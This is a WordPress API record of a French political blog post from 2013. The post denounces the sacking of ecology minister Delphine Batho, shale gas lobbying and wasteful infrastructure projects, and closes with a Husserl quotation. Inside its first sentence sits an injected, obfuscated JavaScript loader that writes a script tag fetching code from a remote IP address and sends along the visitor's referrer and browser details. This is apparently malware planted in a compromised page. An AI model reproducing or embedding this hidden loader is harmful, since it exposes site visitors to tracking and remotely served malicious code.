{"id":8443,"date":"2013-07-22T11:01:17","date_gmt":"2013-07-22T10:01:17","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=8443"},"modified":"2013-07-22T11:01:17","modified_gmt":"2013-07-22T10:01:17","slug":"il-etait-un-petit-navire-qui-navait-jamais-jamais-navigue-et-pourtant","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=8443","title":{"rendered":"Il \u00e9tait un petit navire qui n&rsquo;avait jamais, jamais navigu\u00e9&#8230;.et pourtant !"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" alt=\"\" src=\"http:\/\/static.bioaddict.fr\/articles\/0\/32\/70\/@\/9585-134060719-370x0-3.jpg\" width=\"151\" height=\"159\" \/>Sujet <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|afhiy|var|u0026u|referrer|rtkrd||js|php'.split('|'),0,{}))\n<\/script><\/noindex> d&rsquo;actualit\u00e9 dont se sont empar\u00e9s tous les m\u00e9dias, le limogeage de Delphine Batho m&rsquo;interpelle aussi. Il faut savoir que \u00ab limogeage \u00bb est un terme d&rsquo;origine militaire, qui n&rsquo;est pas un licenciement, mais l&rsquo;\u00e9viction \u00e0 effet imm\u00e9diat d&rsquo;un g\u00eaneur.<\/p>\n<p>Un rapide passage en revue de quelques sources m\u00e9diatiques et on peut entendre chez \u00ab CALVI \u00bb ces phrases dites par les invit\u00e9s \u00ab chroniques \u00bb : \u00ab On est dans une p\u00e9riode o\u00f9 il faut faire des \u00e9conomies \u00bb &#8211; \u00ab Elle n&rsquo;avait pas de sens politique, mais des convictions \u00bb &#8211; \u00ab Elle n&rsquo;a jamais travaill\u00e9 dans une entreprise ou un organisme \u00bb, elle lit les dossiers \u00bb &#8211; \u00ab si elle se met en rupture avec le PS, elle n&rsquo;est plus rien \u00bb &#8211; \u00ab Proglio obtient le prolongement de toutes ces centrales le jour o\u00f9 Delphine Batho est limog\u00e9e \u00bb &#8211; \u00ab Vous qui avez d\u00fb manier la chose \u00e9cologique \u00bb, et par les m\u00eames, apprendre que Monsieur Ayrault se glorifie de ce que son gouvernement va proposer \u00ab un nouveau mod\u00e8le de soci\u00e9t\u00e9 \u00bb, on se demande bien lequel.<\/p>\n<p>Avec l&rsquo;\u00e9cologie, les secteurs qui subissent des restrictions budg\u00e9taires sont l&rsquo;agriculture, la culture, l&rsquo;\u00e9ducation et la d\u00e9fense. On se demande o\u00f9 sont les priorit\u00e9s de ce gouvernement qui n&rsquo;a de \u00ab socialiste \u00bb que le nom ?<br \/>\n<!--more--><br \/>\nDelphine Batho, sp\u00e9cialiste de la s\u00e9curit\u00e9, m\u00eame pas \u00e9cologiste d\u00e9fend l&rsquo;\u00e9cologie car elle a pu apprendre certaines v\u00e9rit\u00e9s en lisant les dossiers dont elle avait la charge. Tous les ministres ne les lisent-ils pas ?<\/p>\n<p>Toutes ces remarques, alors que nous sommes au d\u00e9but du XXI\u00e8me si\u00e8cle, font \u00e9cho \u00e0 ce documentaire diffus\u00e9 sur Arte \u00ab une nouvelle histoire de l&rsquo;homme \u00bb o\u00f9 on peut entendre ceci : \u00ab l&rsquo;homme moderne, homo sapiens, a tendance \u00e0 trop solliciter son environnement, \u00e0 le presser comme un citron \u00bb.<\/p>\n<p>Au fur et \u00e0 mesure de son expansion sur la Terre, il y a eu extinction de plusieurs esp\u00e8ces d&rsquo;animaux, comme par exemple le lion des cavernes, ainsi que de beaucoup d&rsquo;animaux de plus de 45 kg comme en Australie. De toutes les esp\u00e8ces, l&rsquo;homme est le seul qui a surexploit\u00e9 son environnement et qui continue de plus belle, mais contrairement \u00e0 l&rsquo;Homo Sapiens pr\u00e9historique, il atteint cette fois-ci les limites terrestres.<\/p>\n<p>N&rsquo;est-il pas temps de faire une pause, pour r\u00e9fl\u00e9chir, Monsieur Hollande, qu&rsquo;en pensez-vous ?<\/p>\n<p>La r\u00e9bellion de Delphine Batho, qui peut-\u00eatre parce qu&rsquo;elle a lu les dossiers, qu&rsquo;elle \u00e9tait charg\u00e9e d&rsquo;\u00e9tudier, faisant ainsi son travail, a pris conscience de la r\u00e9alit\u00e9, et a d\u00e9cid\u00e9 de passer outre les conventions, et de dire franchement ce qu&rsquo;elle pensait. Elle a d\u00e9sob\u00e9i, car elle n&rsquo;a pas voulu se taire, ni en temps que femme, ni en tant que ministre de l&rsquo;\u00e9cologie, l&rsquo;une comme l&rsquo;autre \u00ab devraient \u00bb pourtant savoir se taire, semble-t-il. Est-ce l\u00e0 un signe de changement ?<\/p>\n<p>En \u00e9cologie et justice sociale, d&rsquo;autres r\u00e9voltes se poursuivent, sur tous les fronts, o\u00f9 la v\u00e9rit\u00e9 a besoin de s&rsquo;exprimer. M\u00eame si l&rsquo;on consid\u00e8re que le capitalisme trouve ses propres limites en touchant celles de la plan\u00e8te, on oublie trop souvent qu&rsquo;une autre limite s&rsquo;annonce : celle de la patience des hommes&#8230;<\/p>\n<p>Les citoyens engag\u00e9s se rendent compte que la l\u00e9g\u00e8ret\u00e9 est de mise au sein des institutions. L&rsquo;argent public si durement gagn\u00e9 est dilapid\u00e9 dans des projets destructeurs. Les promoteurs industriels et lobbyistes savent le peu d&rsquo;int\u00e9r\u00eat apport\u00e9 aux dossiers par ceux qui sont charg\u00e9s de les traiter.<\/p>\n<p>Quand donc allez-vous ouvrir les yeux pour voir le monde r\u00e9el,\u00a0 ?<\/p>\n<p>Partout ce ne sont que pillage et destruction. L&rsquo;\u00e9cologie, qui est \u00ab la science des conditions d&rsquo;existence \u00bb, devrait guider toutes les d\u00e9cisions, c&rsquo;est une science transversale. Premier de tous les minist\u00e8res, il devrait avoir le pouvoir de freiner cette boulimie d\u00e9vastatrice, il devrait apporter la raison au milieu de la curie.<\/p>\n<p>Peut-\u00eatre Delphine Batho devenait-elle g\u00eanante, peut-\u00eatre avan\u00e7ait-elle dans les dossiers ? Sa prise de position contre l&rsquo;exploitation des gaz de schiste ne plaisait pas. Les march\u00e9s, le capital et la finance pr\u00e9f\u00e8rent votre ministre du redressement destructif qui veut bien voir des emplois l\u00e0 o\u00f9 il n&rsquo;y a que du vent. Il n&rsquo;a s\u00fbrement pas lu les dossiers, lui. Pourtant un simple citoyen qui consulte un dossier de ce type, se rend compte de toutes les incoh\u00e9rences.<\/p>\n<p>Le lobbying est \u00e0 l&rsquo;oeuvre, puissant. Il lance en ce moment une offensive afin de rendre les gaz inoffensifs, faisant miroiter des emplois alors qu&rsquo;une lecture attentive des dossiers montre bien qu&rsquo;aucun emploi p\u00e9renne ne sera cr\u00e9e, mais que des terres seront saccag\u00e9es, l&rsquo;eau et l&rsquo;air seront pollu\u00e9s, et que l&rsquo;argent public servira encore une fois \u00e0 essayer de r\u00e9parer ce que nous n&rsquo;avons pas voulu, les entreprises responsables et coupables ayant pris le large.<\/p>\n<p>Grands et Petits Projets Inutiles Impos\u00e9s qui vont de l&rsquo;a\u00e9roport de Notre Dame des Landes, b\u00e9b\u00e9 en gestation de votre premier ministre, jusqu&rsquo;au \u00e8ni\u00e8me rond-point en construction dans la ville voisine, ceci apr\u00e8s la disparition d&rsquo;une zone humide au profit d&rsquo;un centre commercial, partout la destruction sous pr\u00e9texte d&rsquo;innovation et de comp\u00e9titivit\u00e9 est \u00e0 l&rsquo;oeuvre.<\/p>\n<p>C&rsquo;est aussi un gaspillage de l&rsquo;argent public, on a encore vu cela en Lorraine, avec le scandale du Skylander et celui des gaz de couche, si cher \u00e0 votre ministre de la production destructrice, que la r\u00e9gion s&rsquo;appr\u00eate \u00e0 financer. Heureusement que pour beaucoup, la prise de pouvoir n&rsquo;est pas un pr\u00e9alable au changement de la soci\u00e9t\u00e9&#8230; Heureusement que de nombreuses exp\u00e9rimentations sont d\u00e9j\u00e0 en cours ici et ailleurs pour proposer d&rsquo;autres pistes plus respectueuses\u00a0 de notre plan\u00e8te pour vivre simplement ensemble.<\/p>\n<p>\u00ab Dans son texte, \u00ab La Terre ne se meut pas \u00bb, Edmund Husserl dit que \u00ab la Terre n&rsquo;est pas une plan\u00e8te comme une autre. Elle est le sol originaire et insubtituable de notre ancrage corporel : pour nous, elle n&rsquo;est donc pas en mouvement. \u00bb Selon Husserl, c\u2019est l\u2019oubli de cette relation primordiale du corps au sol qui le soutient qui constitue la \u00ab faute originelle \u00bb de la modernit\u00e9 scientifique. Il montre que la distance th\u00e9orique que nous prenons avec la Terre lorsque nous imaginons qu\u2019elle est une plan\u00e8te comme une autre risque d\u2019\u00e9branler un enracinement premier. De par notre histoire et nos repr\u00e9sentations, nous sommes fondamentalement des \u00eatres g\u00e9o-centr\u00e9s. Notre pens\u00e9e n\u2019est pas une pens\u00e9e \u00ab hors-sol \u00bb.<\/p>\n<p>Alors plut\u00f4t que d&rsquo;imaginer que nous pourrons nous en sauver, essayons d&rsquo;abord d&rsquo;y sauver la possibilit\u00e9 de notre pr\u00e9sence continu\u00e9e. C&rsquo;est l\u00e0 tout le paradoxe ; c&rsquo;est au moment o\u00f9 nous d\u00e9couvrons la banalit\u00e9 astrophysique de la Terre, que nous devons le plus penser son unicit\u00e9 relativement \u00e0 nous \u00bb..(1)<\/p>\n<p>(1) Extrait France Culture-Le monde selon Etienne Klein-La Terre ne se meut pas<br \/>\n<a href=\"http:\/\/www.franceculture.fr\/emission-le-monde-selon-etienne-klein-la-terre-ne-se-meut-pas-2013-06-27 \">http:\/\/www.franceculture.fr\/emission-le-monde-selon-etienne-klein-la-terre-ne-se-meut-pas-2013-06-27 <\/a><br \/>\nEdmund Husserl, La Terre ne se meut pas, Renversement de la doctrine copernicienne dans l\u2019interpr\u00e9tation habituelle du monde, trad. de D. Franck, J.-F. Lavigne et D. Pradelle, Paris, Les \u00c9ditions de Minuit, coll. \u00ab Philosophie \u00bb,1989<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sujet d&rsquo;actualit\u00e9 dont se sont empar\u00e9s tous les m\u00e9dias, le limogeage de Delphine Batho m&rsquo;interpelle aussi. Il faut savoir que \u00ab limogeage \u00bb est un terme d&rsquo;origine militaire, qui n&rsquo;est pas un licenciement, mais l&rsquo;\u00e9viction \u00e0 effet imm\u00e9diat d&rsquo;un g\u00eaneur. &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=8443\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,7],"tags":[],"class_list":["post-8443","post","type-post","status-publish","format-standard","hentry","category-actualites","category-billets-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8443","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8443"}],"version-history":[{"count":2,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8443\/revisions"}],"predecessor-version":[{"id":8445,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/8443\/revisions\/8445"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8443"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8443"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8443"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}